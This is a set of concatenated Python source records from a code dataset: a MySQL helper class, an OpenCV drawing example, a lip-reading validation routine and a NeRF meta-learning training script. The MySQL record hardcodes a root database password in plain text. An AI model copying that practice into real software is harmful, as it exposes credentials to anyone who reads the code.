self.gap_dict.pop(g)\n        e.parent = None\n        self.elements.remove(e)\n\n    def get_num_elements(self):\n        return len(self.elements)\n\n    def list_elements(self):\n        for i, ele in enumerate(self.elements):\n            print(\"%d: %s (%s): %s\" %\n                  (i, ele.label, type(ele).__name__, ele))\n\n    def element_type(self, i):\n        return type(self.elements[i]).__name__\n","sub_path":"src/rayoptics/optical/elements.py","file_name":"elements.py","file_ext":"py","file_size_in_byte":29291,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
+{"seq_id":"441830585","text":"from mysql import connector\n\n\nclass Database:\n    \"\"\"\n    Database class is used to create an object which can connect to a MySQL database\n    and work with that database.\n    When you initialize an object of the Database class, you have to pass kwargs\n    containing host, user, password, port, database.\n    \"\"\"\n    def __init__(self, **kwargs):\n        self.__host = kwargs['host']\n        self.__user = kwargs['user']\n        self.__password = kwargs['password']\n        self.__port = kwargs['port']\n        self.__database = kwargs['database']\n        \n        self.__connect_database()\n\n    def __connect_database(self):\n        \"\"\"\n        __connect_database is used to connect to your MySQL database.\n        \"\"\"\n        try:\n            self.conn = connector.connect(host=self.__host,\n                                          user=self.__user,\n                                          password=self.__password,\n                                          port=self.__port,\n                                          database=self.__database)\n            self.my_cursor = self.conn.cursor(buffered=True)\n        except:\n            print(\"Can't connect database !!!\")\n\n    def get_all(self, sql: str):\n        \"\"\"\n        get all records from a table in the database\n        input: sql query\n        return: a list of rows on success\n        \"\"\"\n        try:\n            self.my_cursor.execute(sql)\n            data = self.my_cursor.fetchall()\n            return data\n        except:\n            print(\"Can't get data !!!\")\n\n    def get_item(self, sql: str, *params):\n        \"\"\"\n        get the first record which fits the condition\n        input: sql query: string, params: tuple containing the conditions\n        return: a record tuple on success\n        \"\"\"\n        try:\n            self.my_cursor.execute(sql, params)\n            data = self.my_cursor.fetchone()\n            return data\n        except:\n            print(\"Can't get data !!!\")\n\n    def insert_item(self, sql: str, *args):\n        \"\"\"\n        insert a new record into a table in your database.\n        input: sql query: string, args: tuple containing the field values\n        \"\"\"\n        try:\n            self.my_cursor.execute(sql, args)\n            self.conn.commit()\n        except:\n            print(\"Can't Insert !!!\")\n\n    def insert_list(self, sql: str, items):\n        \"\"\"\n        insert a list of new records into a table in your database.\n        input: sql query: string, items: a list of tuples containing the records\n        \"\"\"\n        try:\n            self.my_cursor.executemany(sql, items)\n            self.conn.commit()\n        except:\n            print(\"Can't Insert !!!\")\n\n    def update(self, sql: str, *args):\n        \"\"\"\n        update a specific record (matched by old_name) in your table.\n        input: sql query: string, a tuple containing the fields\n        \"\"\"\n        try:\n            self.my_cursor.execute(sql, args)\n            self.conn.commit()\n        except:\n            print(\"Can't update!!!\")\n\n    def delete(self, sql: str, *params):\n        \"\"\"\n        delete a record in your table matching the given name.\n        input: sql query: string, params: tuple containing the conditions\n        \"\"\"\n        try:\n            self.my_cursor.execute(sql, params)\n            self.conn.commit()\n        except:\n            print(\"Can't delete !!!\")\n\nmy_db = Database(host='localhost',\n                 user='root',\n                 password='ductai2207',\n                 port='3307',\n                 database='bap_ai')\n#\n# sql = \"SELECT * FROM customers WHERE name=%s\"\n# # print(my_db.get_all())\n# name =(\"eee\",)\n# print(my_db.get_item(sql, *name))\n#\n# #\n# def testInsert():\n#     sql = 
\"INSERT INTO customers(name, address, age) VALUES (%s, %s, %s)\"\n# # new_name = input(\"Enter new name: \")\n# # new_address = input(\"Enter new address: \")\n# # age = int(input(\"Enter age: \"))\n# # params = (new_name, new_address, age)\n# params = ('ooo', '0', 12)\n# my_db._insert_item(sql, *params)\n#\n# def testUpdate():\n# sql = \"UPDATE customers SET name=%s, address=%s, age=%s WHERE name=%s\"\n# old_name = input(\"Enter customer's name need to update: \")\n# new_name = input(\"Enter new name: \")\n# new_address = input(\"Enter new address: \")\n# age = int(input(\"Enter age: \"))\n# params = (new_name, new_address, age, old_name)\n# my_db._update(sql, *params)\n#\n# def testDelete():\n# sql = \"DELETE FROM customers WHERE name=%s\"\n# # name = input(\"Enter customer's name need to delete: \")\n# # tuple(name)\n# name = (\"ohh\",)\n# my_db._delete(sql, *name)\n\n# testUpdate()\n# testInsert()\n# testDelete()\n\n# items = [('You', 'ngo quyen', 23), ('Hoc', 'ngo si lien', 20)]\n# my_db._insert_list(items)\n\n","sub_path":"Database_exercise/connect_db.py","file_name":"connect_db.py","file_ext":"py","file_size_in_byte":4786,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"3201255","text":"# ch34_3.py\nimport cv2\ncv2.namedWindow(\"MyPicture\") # 使用預設\nimg = cv2.imread(\"antarctica3.jpg\") # 彩色讀取\ncv2.line(img,(100,100),(1200,100),(255,0,0),2) # 輸出線條\ncv2.rectangle(img,(100,200),(1200,400),(0,0,255),2) # 輸出矩陣\ncv2.putText(img,\"I Like Python\",(400,350), # 輸出文字\n cv2.FONT_ITALIC,3,(255,0,0),8)\ncv2.imshow(\"MyPicture\", img) # 顯示影像img\ncv2.waitKey(3000) # 等待3秒\ncv2.destroyAllWindows() # 刪除所有視窗\n\n\n\n\n\n\n \n","sub_path":"pratice/範例檔案/ch34/ch34_3.py","file_name":"ch34_3.py","file_ext":"py","file_size_in_byte":649,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"441096930","text":"import torch\nfrom torch.autograd import Variable\nfrom torch.utils.data import DataLoader\nfrom LipReadDataTest import ReadData\nimport opt\n\n\n\ndef valid(model, epoch):\n test_dataset = ReadData(opt.test_image_file, seq_max_lens=24)\n test_data_loader = DataLoader(test_dataset, batch_size=opt.num_workers, shuffle=True, num_workers=opt.num_workers, drop_last=False)\n n_samples = len(test_data_loader.dataset)\n\n # GPU\n device = torch.device('cuda:0')\n # # CPU\n # device = torch.device('cpu')\n model.eval()\n\n with torch.no_grad():\n running_corrects = 0.\n\n for i_batch, sample_batched in enumerate(dataloader):\n\n input_data = Variable(sample_batched['volume']).to(device)\n labels = Variable(sample_batched['label']).long().to(device)\n length = Variable(sample_batched['length']).to(device)\n\n outputs = model(input_data)\n\n batch_correct = validator(outputs, length, labels, every_frame=False)\n running_corrects += batch_correct\n\n acc = float(running_corrects) / n_samples\n print(f'Epoch:\\t{epoch}\\tAcc:{acc}\\n')\n return acc\n\n\ndef validator(modelOutput, length, labels, every_frame=False):\n labels = labels.cpu()\n averageEnergies = torch.zeros((modelOutput.size(0), modelOutput.size(-1)))\n for i in range(modelOutput.size(0)):\n if every_frame:\n averageEnergies[i] = torch.mean(modelOutput[i, :length[i]], 0)\n else:\n averageEnergies[i] = modelOutput[i, length[i] - 1]\n\n _, maxindices = torch.max(averageEnergies, 1)\n count = torch.sum(maxindices == labels)\n return 
count\n\n","sub_path":"valid.py","file_name":"valid.py","file_ext":"py","file_size_in_byte":1643,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"373822300","text":"import argparse\nimport json\nimport copy\nimport torch\nimport torch.nn.functional as F\nfrom torch.utils.data import DataLoader\nfrom models.weight_generator import WeightGenerator, add_weight_res\nfrom models.nerf import build_nerf, set_grad\nfrom models.rendering import get_rays_shapenet, sample_points, volume_render\nfrom datasets.shapenetV2 import build_shapenetV2\nimport wandb\nfrom weight_gen_test import test\nfrom rich import print\nfrom rich import pretty\npretty.install()\nfrom rich import traceback\ntraceback.install()\nfrom utils.shape_video import create_360_video\nfrom pathlib import Path\nfrom torchvision.utils import make_grid\nimport torch.nn as nn\nimport numpy as np\nimport random\nSEED=42\ntorch.manual_seed(SEED)\nrandom.seed(SEED)\nnp.random.seed(SEED)\nimport lpips\nimport pytorch_ssim\nimport logging\nimport hydra\nfrom omegaconf import DictConfig\nfrom hydra.core.hydra_config import HydraConfig\nimport os\n\ndef make_img_idx(available_views, num_views, num_runs):\n idx_list = []\n finished = 0\n idxs = list(range(available_views))\n while finished < num_runs:\n i = np.random.choice(idxs, size=num_views)\n i.sort()\n # if i not in idx_list:\n if len(np.where((idx_list == i))[0]) == 0:\n idx_list.append(i)\n finished +=1\n return idx_list\n\n\ndef split_at_idx(t, idx=[0]):\n\n\n t1 = []\n t2 = []\n b = t.size()[0]\n for i in range(b):\n if i in idx:\n t1.append(t[i])\n else:\n t2.append(t[i])\n\n t1 = torch.stack(t1, dim=0)\n t2 = torch.stack(t2, dim=0)\n return t1, t2\n\ndef inner_loop(args, nerf_model, nerf_optim, pixels, imgs, rays_o, rays_d,\n poses, bound, hwf, num_samples, raybatch_size, inner_steps,\n device, idx, log_round=False, setup=\"train/\", input_idx=[0]):\n \"\"\"\n train the inner model for a specified number of iterations\n \"\"\"\n num_rays = rays_d.shape[0]\n logs = dict()\n for i in range(1, inner_steps+1):\n if log_round and ((i % args.nerf.tto_log_steps == 0) or (i == inner_steps) or (i==1)):\n with torch.no_grad():\n scene_psnr, scene_lpips_alex, scene_lpips_vgg, scene_ssims =\\\n 0, 0, 0, 0\n scene_psnr, scene_lpips_alex, scene_lpips_vgg, scene_ssims\\\n = report_result(nerf_model, imgs,\n poses, hwf,\n bound, num_samples, raybatch_size)\n vid_save_path = os.path.join(cwd, \"video\")\n vid_frames = create_360_video(args.nerf, nerf_model, hwf, bound,\n device,\n idx, vid_save_path)\n\n if \"train\" in setup:\n logs[setup + \"SSIM tto_step=\" + str(i)] = scene_ssims\n logs[setup + \"LPIPS_vgg tto_step=\" + str(i)] = scene_lpips_vgg\n logs[setup + \"LPIPS_alexnet tto_step=\" + str(i)] = scene_lpips_alex\n logs[setup + \"scene_psnr tto_step=\" + str(i)] = scene_psnr\n logs[setup + \"vid_post tto_step=\" + str(i)] = wandb.Video(\n vid_frames.transpose(0, 3, 1, 2), fps=30,\n format=\"mp4\")\n else:\n logs[setup + \"SSIM tto_step=\" + str(i)] = scene_ssims\n logs[setup + \"LPIPS_vgg tto_step=\" + str(i)] = scene_lpips_vgg\n logs[setup + \"LPIPS_alexnet tto_step=\" + str(i)] = scene_lpips_alex\n logs[setup + \"scene_psnr tto_step=\" + str(i)] = scene_psnr\n logs[setup + \"vid_post input_idx=\" + str(input_idx) + \" tto_step=\" + str(i)] = wandb.Video(\n vid_frames.transpose(0, 3, 1, 2), fps=30,\n format=\"mp4\")\n\n indices = torch.randint(num_rays, size=[raybatch_size])\n raybatch_o, raybatch_d = rays_o[indices], rays_d[indices]\n 
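# look up the ground-truth pixel colors for the sampled rays\n        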
pixelbatch = pixels[indices] \n t_vals, xyz = sample_points(raybatch_o, raybatch_d, bound[0], bound[1],\n num_samples, perturb=True)\n \n\n rgbs, sigmas = nerf_model(xyz)\n colors = volume_render(rgbs, sigmas, t_vals, white_bkgd=True)\n loss = F.mse_loss(colors, pixelbatch)\n loss.backward()\n nerf_optim.step()\n nerf_optim.zero_grad()\n\n return logs, nerf_model\n\n\n\ndef train_meta(args, epoch_idx, nerf_model, gen_model, gen_optim, data_loader, device, ref_state_dict=None):\n \"\"\"\n train the meta_model for one epoch using reptile meta learning\n https://arxiv.org/abs/1803.02999\n \"\"\"\n gen_model.train()\n gen_model.requires_grad_(True)\n gen_model.feature_extractor.requires_grad_(False)\n\n\n step = (epoch_idx-1)*len(data_loader)\n train_step = (epoch_idx - 1) * len(data_loader) + 1\n psnr_accum = dict()\n ssim_accum = dict()\n lpips_alex_accum = dict()\n lpips_vgg_accum = dict()\n\n avg_psnr = 0\n avg_ssim = 0\n avg_lpips_alex = 0\n avg_lpips_vgg = 0\n for idx, batch in enumerate(data_loader):\n log_round=(step % args.log_interval == 0)\n\n imgs = batch[\"imgs\"]\n poses = batch[\"poses\"]\n hwf = batch[\"hwf\"]\n bound = batch[\"bound\"]\n relative_poses = batch[\"relative_poses\"]\n\n imgs, poses, hwf, bound, relative_poses = imgs.to(device), poses.to(device), hwf.to(device), bound.to(device), relative_poses.to(device)\n imgs, poses, hwf, bound, relative_poses = imgs.squeeze(), poses.squeeze(), hwf.squeeze(), bound.squeeze(), relative_poses.squeeze()\n rays_o, rays_d = get_rays_shapenet(hwf, poses)\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\n num_rays = rays_d.shape[0]\n pixels = imgs.reshape(-1, 3)\n\n # Train weight generator\n nerf_model_copy = copy.deepcopy(nerf_model) #! copy meta model initialized weights\n weight_res = gen_model(imgs, relative_poses, bound)\n\n nerf_model_copy, logs_weight_stat = \\\n add_weight_res(nerf_model_copy, weight_res, log_round=log_round,\n setup=\"train/\", std_scale=args.feat.std_scale, hidden_layers=args.nerf.nerf_hidden_layers)\n indices = torch.randint(num_rays, size=[args.nerf.train_batchsize])\n raybatch_o, raybatch_d = rays_o[indices], rays_d[indices]\n pixelbatch = pixels[indices]\n t_vals, xyz = sample_points(raybatch_o, raybatch_d, bound[0], bound[1],\n args.nerf.num_samples, perturb=True)\n\n rgbs, sigmas = nerf_model_copy(xyz)\n colors = volume_render(rgbs, sigmas, t_vals, white_bkgd=True)\n\n loss = F.mse_loss(colors, pixelbatch)\n # loss.backward()\n # gen_optim.step()\n # gen_optim.zero_grad()\n\n #! this block causes problem when trying to do reptile loss since\n #! 
weight assignment is an in-place operation\n        inner_nerf_model_copy = copy.deepcopy(nerf_model)\n        for i in range(len(nerf_model_copy.net)):\n            if hasattr(nerf_model_copy.net[i], \"weight\"):\n                layer = nerf_model_copy.net[i].weight.clone()\n                layer.grad=None\n                inner_nerf_model_copy.net[i].weight = nn.Parameter(layer)\n\n        inner_nerf_model_copy = set_grad(inner_nerf_model_copy, True)\n        inner_nerf_model_copy.train()\n        nerf_optim = torch.optim.SGD(inner_nerf_model_copy.parameters(), args.nerf.inner_lr)\n\n        logs, tto_nerf_model = inner_loop(args, inner_nerf_model_copy, nerf_optim, pixels, imgs,\n                                rays_o, rays_d, poses, bound, hwf, args.nerf.num_samples,\n                                args.nerf.train_batchsize, args.nerf.inner_steps,\n                                device=device, idx=idx, log_round=log_round, setup=\"train/\")\n\n        if args.feat.use_reptile_loss:\n            gt_res = []\n            for i in range(args.nerf.nerf_hidden_layers):\n                l = i * 2 + 1\n                gt_res.append(torch.flatten(tto_nerf_model.net[l].weight.data - nerf_model.net[l].weight.data))\n            gt_res = torch.cat(gt_res).detach().requires_grad_(True)\n            gt_res.grad=None\n            reptile_loss= F.mse_loss(gt_res, weight_res)*args.feat.reptile_loss_weight\n            loss += reptile_loss\n\n        loss.backward()\n        gen_optim.step()\n        gen_optim.zero_grad()\n\n        if log_round:\n            if args.feat.use_reptile_loss:\n                logs[\"reptile_loss\"] = reptile_loss\n            avg_psnr += logs[\"train/scene_psnr tto_step=\" + str(args.nerf.inner_steps)]\n            avg_lpips_alex += logs[\"train/LPIPS_alexnet tto_step=\"+ str(args.nerf.inner_steps)]\n            avg_lpips_vgg += logs[\"train/LPIPS_vgg tto_step=\"+ str(args.nerf.inner_steps)]\n            avg_ssim += logs[\"train/SSIM tto_step=\"+ str(args.nerf.inner_steps)]\n\n            logs[\"train/gen_model_mse_loss\"] = float(loss)\n            logs = {**logs, **logs_weight_stat, \"train_step\": train_step,\n                    \"train/imgs\":wandb.Image(make_grid(imgs.permute(0, 3, 1, 2)))}\n            wandb.log(logs)\n\n            for (key, val) in logs.items():\n                if \"psnr\" in key:\n                    if psnr_accum.get(key) is None:\n                        psnr_accum[key] = 0\n                    psnr_accum[key] += val\n\n                if \"LPIPS_vgg\" in key:\n                    if lpips_vgg_accum.get(key) is None:\n                        lpips_vgg_accum[key] = 0\n                    lpips_vgg_accum[key] += val\n\n                if \"LPIPS_alexnet\" in key:\n                    if lpips_alex_accum.get(key) is None:\n                        lpips_alex_accum[key] = 0\n                    lpips_alex_accum[key] += val\n\n                if \"SSIM\" in key:\n                    if ssim_accum.get(key) is None:\n                        ssim_accum[key] = 0\n                    ssim_accum[key] += val\n        step+=1\n    psnr_mean = dict()\n    ssim_mean = dict()\n    lpips_alex_mean = dict()\n    lpips_vgg_mean = dict()\n\n    for (key, val) in psnr_accum.items():\n        psnr_mean[key + \"_mean\"] = val / len(data_loader)\n    for (key, val) in lpips_alex_accum.items():\n        lpips_alex_mean[key + \"_mean\"] = val / len(data_loader)\n    for (key, val) in lpips_vgg_accum.items():\n        lpips_vgg_mean[key + \"_mean\"] = val / len(data_loader)\n    for (key, val) in ssim_accum.items():\n        ssim_mean[key + \"_mean\"] = val / len(data_loader)\n\n    avg_psnr /= len(data_loader)\n    avg_lpips_alex /= len(data_loader)\n    avg_lpips_vgg /= len(data_loader)\n    avg_ssim /= len(data_loader)\n\n    wandb.log({**psnr_mean, **lpips_alex_mean, **lpips_vgg_mean,\n               **ssim_mean, \"train/PSNR_epoch_mean\": avg_psnr,\n               \"train/LPIPS_alexnet_epoch_mean\":avg_lpips_alex,\n               \"train/LPIPS_vgg_epoch_mean\":avg_lpips_vgg,\n               \"train/SSIM_epoch_mean\":avg_ssim})\n\ndef report_result(model, imgs, poses, hwf, bound, num_samples, raybatch_size):\n    \"\"\"\n    report view-synthesis result on heldout views\n    \"\"\"\n    ray_origins, ray_directions = get_rays_shapenet(hwf, poses)\n\n    view_psnrs = []\n    view_lpips_alex = []\n    view_lpips_vgg = []\n    view_ssims = []\n    for img, rays_o, rays_d 
in zip(imgs, ray_origins, ray_directions):\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\n t_vals, xyz = sample_points(rays_o, rays_d, bound[0], bound[1],\n num_samples, perturb=False)\n\n synth = []\n num_rays = rays_d.shape[0]\n with torch.no_grad():\n for i in range(0, num_rays, raybatch_size):\n rgbs_batch, sigmas_batch = model(xyz[i:i+raybatch_size])\n color_batch = volume_render(rgbs_batch, sigmas_batch,\n t_vals[i:i+raybatch_size],\n white_bkgd=True)\n synth.append(color_batch)\n synth = torch.cat(synth, dim=0).reshape_as(img)\n error = F.mse_loss(img, synth)\n psnr = -10*torch.log10(error)\n view_psnrs.append(psnr)\n\n # additional metrics (lpips alexnet, lpips vgg, ssim)\n img_lpips = torch.unsqueeze(img.permute(2, 0, 1) * 2 - 1, 0)\n synth_lpips = torch.unsqueeze(synth.permute(2, 0, 1) * 2 - 1, 0)\n view_lpips_alex.append(lpips_alex(img_lpips, synth_lpips))\n view_lpips_vgg.append(lpips_vgg(img_lpips, synth_lpips))\n view_ssims.append(pytorch_ssim.ssim(torch.unsqueeze(img, dim=0),\n torch.unsqueeze(synth, dim=0)))\n\n scene_psnr = torch.stack(view_psnrs).mean()\n scene_lpips_alex = torch.stack(view_lpips_alex).mean()\n scene_lpips_vgg = torch.stack(view_lpips_vgg).mean()\n scene_ssim = torch.stack(view_ssims).mean()\n return scene_psnr, scene_lpips_alex, scene_lpips_vgg, scene_ssim\n\n\ndef val_meta(args, epoch_idx, nerf_model, gen_model, val_loader, device):\n \"\"\"\n validate the meta trained model for few-shot view synthesis\n \"\"\"\n gen_model.eval()\n gen_model.requires_grad_(False)\n meta_trained_state = nerf_model.state_dict()\n\n val_step = max((epoch_idx-1)*len(val_loader) +1, 0)\n psnr_accum = dict()\n ssim_accum = dict()\n lpips_alex_accum = dict()\n lpips_vgg_accum = dict()\n\n avg_psnr = 0\n avg_ssim = 0\n avg_lpips_alex = 0\n avg_lpips_vgg = 0\n for idx, batch in enumerate(val_loader):\n imgs = batch[\"imgs\"]\n poses = batch[\"poses\"]\n hwf = batch[\"hwf\"]\n bound = batch[\"bound\"]\n relative_poses = batch[\"relative_poses\"]\n\n imgs, poses, hwf, bound, relative_poses = imgs.to(device), poses.to(device), \\\n hwf.to(device), bound.to(device), relative_poses.to(device)\n imgs, poses, hwf, bound, relative_poses = imgs.squeeze(), \\\n poses.squeeze(), \\\n hwf.squeeze(), \\\n bound.squeeze(), relative_poses.squeeze()\n\n for i in range(args.val_per_scene):\n img_idx = val_views[i]\n tto_imgs, test_imgs = split_at_idx(imgs, idx=img_idx)\n tto_poses, test_poses = split_at_idx(poses, idx=img_idx)\n\n rays_o, rays_d = get_rays_shapenet(hwf, tto_poses)\n rays_o, rays_d = rays_o.reshape(-1, 3), rays_d.reshape(-1, 3)\n num_rays = rays_d.shape[0]\n\n tto_pixels = tto_imgs.reshape(-1, 3)\n # Add weight residual\n val_model = copy.deepcopy(nerf_model)\n val_model.load_state_dict(meta_trained_state)\n val_model = set_grad(val_model, False)\n\n with torch.no_grad():\n weight_res = gen_model(imgs[:25], relative_poses[:25], bound[:25])\n val_model, logs_weight_stat = \\\n add_weight_res(val_model, weight_res, log_round=True,\n setup=\"val/\", std_scale=args.feat.std_scale)\n indices = torch.randint(num_rays, size=[args.nerf.train_batchsize])\n raybatch_o, raybatch_d = rays_o[indices], rays_d[indices]\n pixelbatch = tto_pixels[indices]\n t_vals, xyz = sample_points(raybatch_o, raybatch_d, bound[0], bound[1],\n args.nerf.num_samples, perturb=True)\n rgbs, sigmas = val_model(xyz)\n colors = volume_render(rgbs, sigmas, t_vals, white_bkgd=True)\n val_loss = F.mse_loss(colors, pixelbatch)\n\n\n inner_val_model = copy.deepcopy(val_model)\n for j in 
range(len(val_model.net)):\n                if hasattr(val_model.net[j], \"weight\"):\n                    layer = val_model.net[j].weight.clone()\n                    layer.grad = None\n                    inner_val_model.net[j].weight = nn.Parameter(layer)\n\n            inner_val_model = set_grad(inner_val_model, True)\n            inner_val_model.train()\n            val_optim = torch.optim.SGD(inner_val_model.parameters(), args.nerf.tto_lr)\n\n\n            logs,_ = inner_loop(args, inner_val_model, val_optim, tto_pixels, tto_imgs, rays_o,\n                            rays_d, tto_poses, bound, hwf, args.nerf.num_samples,\n                            args.nerf.tto_batchsize, args.nerf.tto_steps,\n                            device=device, idx=idx, log_round=True, setup=\"val/\", input_idx=img_idx)\n\n            avg_psnr += logs[\"val/scene_psnr tto_step=\" + str(args.nerf.tto_steps)]\n            avg_lpips_alex += logs[\n                \"val/LPIPS_alexnet tto_step=\" + str(args.nerf.tto_steps)]\n            avg_lpips_vgg += logs[\n                \"val/LPIPS_vgg tto_step=\" + str(args.nerf.tto_steps)]\n            avg_ssim += logs[\"val/SSIM tto_step=\" + str(args.nerf.tto_steps)]\n\n            logs[\"val/tto_views\"] = wandb.Image(make_grid(tto_imgs.permute(0, 3, 1, 2)))\n            logs[\"val/test_views\"] = wandb.Image(make_grid(test_imgs.permute(0, 3, 1, 2)))\n            logs[\"val/mse_loss\"] = val_loss\n            logs = {**logs, **logs_weight_stat, \"val_step\":val_step}\n            wandb.log(logs)\n            for (key,val) in logs.items():\n                if \"psnr\" in key:\n                    if psnr_accum.get(key) is None:\n                        psnr_accum[key] = 0\n                    psnr_accum[key] += val\n                if \"LPIPS_vgg\" in key:\n                    if lpips_vgg_accum.get(key) is None:\n                        lpips_vgg_accum[key] = 0\n                    lpips_vgg_accum[key] += val\n\n                if \"LPIPS_alexnet\" in key:\n                    if lpips_alex_accum.get(key) is None:\n                        lpips_alex_accum[key] = 0\n                    lpips_alex_accum[key] += val\n\n                if \"SSIM\" in key:\n                    if ssim_accum.get(key) is None:\n                        ssim_accum[key] = 0\n                    ssim_accum[key] += val\n            val_step+=1\n\n    psnr_mean = dict()\n    ssim_mean = dict()\n    lpips_alex_mean = dict()\n    lpips_vgg_mean = dict()\n\n    for (key, val) in psnr_accum.items():\n        psnr_mean[key + \"_mean\"] = val / len(val_loader)\n    for (key, val) in lpips_alex_accum.items():\n        lpips_alex_mean[key + \"_mean\"] = val / len(val_loader)\n    for (key, val) in lpips_vgg_accum.items():\n        lpips_vgg_mean[key + \"_mean\"] = val / len(val_loader)\n    for (key, val) in ssim_accum.items():\n        ssim_mean[key + \"_mean\"] = val / len(val_loader)\n\n    avg_psnr /= len(val_loader)\n    avg_lpips_alex /= len(val_loader)\n    avg_lpips_vgg /= len(val_loader)\n    avg_ssim /= len(val_loader)\n\n    wandb.log({**psnr_mean, **lpips_alex_mean, **lpips_vgg_mean,\n               **ssim_mean, \"val/PSNR_epoch_mean\": avg_psnr,\n               \"epoch_step\":epoch_idx,\n               \"val/LPIPS_alexnet_epoch_mean\": avg_lpips_alex,\n               \"val/LPIPS_vgg_epoch_mean\": avg_lpips_vgg,\n               \"val/SSIM_epoch_mean\": avg_ssim })\n\n\n\n\ndef check_frozen(ckpt, ref_ckpt, layer_res_list=None):\n    eps = 0.0000001\n    i=0\n    for key in ckpt.keys():\n        if \".0.\" in key:\n            continue\n        w = ckpt[key]\n        ref_w = ref_ckpt[key]\n        diff = w - ref_w\n\n        if \"weight\" in key:\n            if layer_res_list is not None:\n                max_diff = (diff-layer_res_list[i]).abs().max()\n                i += 1\n            else:\n                max_diff = diff.abs().max()\n\n\n        if \"bias\" in key:\n            max_diff = diff.abs().max()\n\n        if max_diff > eps:\n            logging.error(key + \" was not the same\\nmax diff: \" + str(max_diff))\n            return False\n        if layer_res_list is not None and i == len(layer_res_list):\n            break\n    return True\n\n@hydra.main(config_path=\"conf\", config_name=\"config\")\ndef main(args: DictConfig) -> None:\n    # parser = argparse.ArgumentParser(description='shapenet few-shot view synthesis')\n    # parser.add_argument('--config', type=str, required=True,\n    #                     help='config file for the shape class (cars, chairs or 
lamps)')\n # parser.add_argument('--weight_path', type=str,default=None,\n # help='config file for the shape class (cars, chairs '\n # 'or lamps)')\n # parser.add_argument('--debug_overfit_single_scene', default=False,\n # action=\"store_true\")\n # parser.add_argument('--use_reptile_loss', default=False,\n # action=\"store_true\")\n # parser.add_argument(\"--note\", type=str, default=None)\n # parser.add_argument(\"--std_scale\", type=float, default=0.2)\n # args = parser.parse_args()\n\n # with open(args.config) as config:\n # info = json.load(config)\n # for key, value in info.items():\n # args.__dict__[key] = value\n # args.savedir = Path(args.savedir)\n\n global cwd\n cwd = os.getcwd()\n\n wandb.init(name=\"train_\"+args.exp_name, dir=cwd, project=\"meta_NeRF\", entity=\"stereo\",\n save_code=True, job_type=\"train\")\n\n wandb.config.update(args)\n\n # device_idx = (HydraConfig.get().job.num) % torch.cuda.device_count()\n # device = torch.device(\"cuda:\"+str(device_idx))\n device = torch.device(\"cuda\")\n train_set = build_shapenetV2(args, image_set=\"train\", dataset_root=args.data.dataset_root,\n splits_path=args.data.splits_path, num_views=args.nerf.train_views)\n train_loader = DataLoader(train_set, batch_size=1, shuffle=True)\n\n val_set = build_shapenetV2(args, image_set=\"val\", dataset_root=args.data.dataset_root,\n splits_path=args.data.splits_path,\n num_views=args.nerf.tto_views+args.nerf.test_views)\n val_loader = DataLoader(val_set, batch_size=1, shuffle=False)\n\n nerf_model = build_nerf(args.nerf)\n nerf_model.to(device)\n\n out_channel = 0\n for l in nerf_model.net:\n if hasattr(l, \"weight\"):\n c = 1\n for x in l.weight.shape:\n c *= x\n out_channel += c\n\n gen_model = WeightGenerator(args, out_channel=out_channel)\n gen_model.to(device)\n gen_model.feature_extractor.to(device)\n\n gen_optim = torch.optim.Adam(gen_model.gen.parameters(), lr=args.nerf.meta_lr)\n\n global lpips_alex\n global lpips_vgg\n lpips_alex = lpips.LPIPS(net='alex').to(device) # best forward scores\n lpips_vgg = lpips.LPIPS(\n net='vgg').to(device) # closer to \"traditional\" perceptual loss, when used for optimization\n\n global val_views\n\n val_views = make_img_idx(args.nerf.test_views, args.feat.weight_gen_views, args.val_per_scene)\n\n logging.info(\"Training set: \" + str(len(train_loader)) + \" images\" )\n logging.info(\"Val set: \" + str(len(val_loader)) + \" images\")\n logging.info(\"validation views:\\n\" + str(val_views))\n\n if getattr(args.data, \"weight_path\", None) is not None:\n checkpoint = torch.load(args.data.weight_path, map_location=device)\n gen_model.load_state_dict(checkpoint['gen_model_state_dict'])\n gen_optim.load_state_dict(checkpoint['gen_optim_state_dict'])\n\n if args.feat.feature_extractor_type == \"mvsnet\":\n checkpoint = torch.load(args.feat.mvsnet_weight_path, map_location=device)\n gen_model.feature_extractor.load_state_dict(checkpoint[\"network_mvs_state_dict\"])\n\n if getattr(args.data, \"nerf_weight_path\", None) is not None:\n nerf_checkpoint = torch.load(args.data.nerf_weight_path, map_location=device)\n\n if \"nerf_model_state_dict\" in nerf_checkpoint.keys():\n nerf_checkpoint = nerf_checkpoint[\"nerf_model_state_dict\"]\n\n elif \"meta_model_state_dict\" in nerf_checkpoint.keys():\n nerf_checkpoint = nerf_checkpoint[\"meta_model_state_dict\"]\n else:\n logging.error(\"checkpoint doesn't contain meta-nerf initialized weights\")\n raise ValueError()\n nerf_model.load_state_dict(nerf_checkpoint)\n else:\n logging.error(\"must provide path to 
metaNeRF initial weights\")\n        raise ValueError()\n\n    wandb.watch(gen_model.gen, log=\"all\", log_freq=100)\n    # val_meta(args, 0, nerf_model, gen_model, val_loader, device)\n    for epoch in range(1, args.nerf.meta_epochs+1):\n        logging.info(\"Epoch \" + str(epoch) + \" training...\")\n        train_meta(args, epoch, nerf_model, gen_model, gen_optim, train_loader, device, ref_state_dict=nerf_checkpoint)\n        val_meta(args, epoch, nerf_model, gen_model, val_loader, device)\n\n        ckpt_name = cwd+\"/\" + args.nerf.exp_name + \"_epoch\" + str(epoch) + \".pth\"\n        torch.save({\n            'epoch': epoch,\n            'gen_model_state_dict': gen_model.state_dict(),\n            'gen_optim_state_dict': gen_optim.state_dict(),\n            'nerf_model_state_dict': nerf_model.state_dict()\n        }, ckpt_name)\n        wandb.save(ckpt_name)\n    logging.info(\"Testing...\")\n    test(args, nerf_model=nerf_model, gen_model=gen_model)\n    logging.info(\"Complete!\")\n\n\nif __name__ == '__main__':\n    main()","sub_path":"weight_gen_train.py","file_name":"weight_gen_train.py","file_ext":"py","file_size_in_byte":25014,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"}
